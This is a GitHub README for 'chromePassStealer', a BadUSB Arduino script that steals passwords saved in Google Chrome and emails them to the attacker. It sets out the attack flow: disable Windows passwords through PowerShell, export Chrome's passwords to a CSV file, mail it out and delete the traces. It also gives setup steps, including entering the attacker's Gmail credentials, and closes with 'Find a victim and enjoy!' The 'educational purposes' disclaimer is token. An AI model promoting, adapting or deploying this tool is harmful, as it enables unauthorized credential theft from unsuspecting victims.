Skip to content

tuconnaisyouknow/chromePassStealer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
 
 
 
 
 
 
 
 

Repository files navigation

chromePassStealer 🥷

This project allows you to steal passwords from Google Chrome and get all the data by mail.

This project isn't updated, if you want a better script click here

Warning ⚠️

Everything in this repository is strictly for educational purposes. Notice I am not responsible for stolen data. You are responsible for your actions using developed script for BadUSB

About ℹ️

Most people who are not well informed about computer science save their passwords on Google Chrome for convenience. This script uses these weaknesses to steal all passwords saved by Google Chrome users. The script makes your BadUSB disable Windows passwords by powershell command line, then it opens Google Chrome and download a .csv file with all Chrome passwords by Windows shortcuts. Once this file is downloaded, the BadUSB send this file by mail from powershell command line. To end up the script delete .csv file and close Google Chrome and powershell.

NB n°1

Sometimes, you will see something like this :

Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(173);
Keyboard.releaseAll(); 

This is only to write these characters : "@", "\". But it depends on the computer's layout, so adapt these characters thanks to this site and the sequence you actually use to wirte these characters with your keyboard. (or switch the keyboard layout to French)

NB n°2

When the script is executed the person who plugged BadUsb see his computer working alone so this script isn't optimized yet.

NB n°3

You can customize the delay according to the speed in which you plug the BadUSB.

Getting Started ✔️

Requirments

  1. Have a BadUSB

  2. Install Arduino software here.

  3. Have a Gmail account and enable less secure app here.

Install

  1. Download this repository

Linux :

git clone https://github.com/tuconnaisyouknow/ChromePassStealer
cd ChromePassStealer

Windows : Click on green button on right top of main page. Then click on "Download Zip" and extract zip file.

  1. Replace your mail and password here or here at line 238, 245, 253, 264

  2. Add your code in the BadUSB by Arduino software

  3. Find a victim and enjoy !

Requirments for victim PC

  • Turn off caps lock
  • Switch the keyboard layout to French (or adapt the code according to your layout)

Help Me ⛑️

If you want to help me, I want to make the script run in background and do all it do from Chrome directly from powershell. Thanks to your contribution !